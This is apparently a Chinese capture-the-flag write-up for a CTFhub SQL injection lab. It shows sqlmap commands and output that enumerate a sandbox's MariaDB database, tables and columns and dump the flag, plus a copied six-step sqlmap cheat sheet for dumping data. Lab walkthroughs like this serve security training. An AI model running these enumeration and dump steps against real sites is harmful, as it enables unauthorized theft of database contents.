1:获取靶场信息
打开目标靶场,打开kali,输入我们的URL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.1.44-MariaDB-0+deb9u1'
current user: 'ctfhub@127.0.0.1'
current database: 'ctfhub'
可以看到数据库名是CTFhub,flag应该就在里面
2:工具6连注入(附属一张别人的总结)
1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点
2. --dbs 【检测站点包含哪些数据库
3. --current-db 【获取当前的数据库名
4. --tables -D "db_name" 【获取指定数据库中的表名 -D后接指定的数据库名称
5. --columns -T "table_name" -D "db_name" 【获取数据库表中的字段
6. --dump -C "columns_name" -T "table_name" -D "db_name" 【获取字段的数据内容
———————————————
原文链接:https://blog.csdn.net/qq_37964989/article/details/84109094
7:然后注入找到下面的表
Database: ctfhub
[2 tables]
+------+
| flag |
| info |
+------+
知道表了我们就直接找吧得到
75 sqlmap -u"http://challenge-538e39ab5040aaa9.sandbox.ctfhub.com:10800/index.php?id=1" -D ctfhub -T flag --columns
Database: ctfhub
Table: flag
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| flag | varchar(255) |
+--------+--------------+
找一下字段里的flag
sqlmap -u"http://challenge-538e39ab5040aaa9.sandbox.ctfhub.com:10800/index.php?id=1" -D ctfhub
-T flag -C flag --dump
Database: ctfhub
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{41aae0f32ad0245468d2b351} |
+----------------------------------+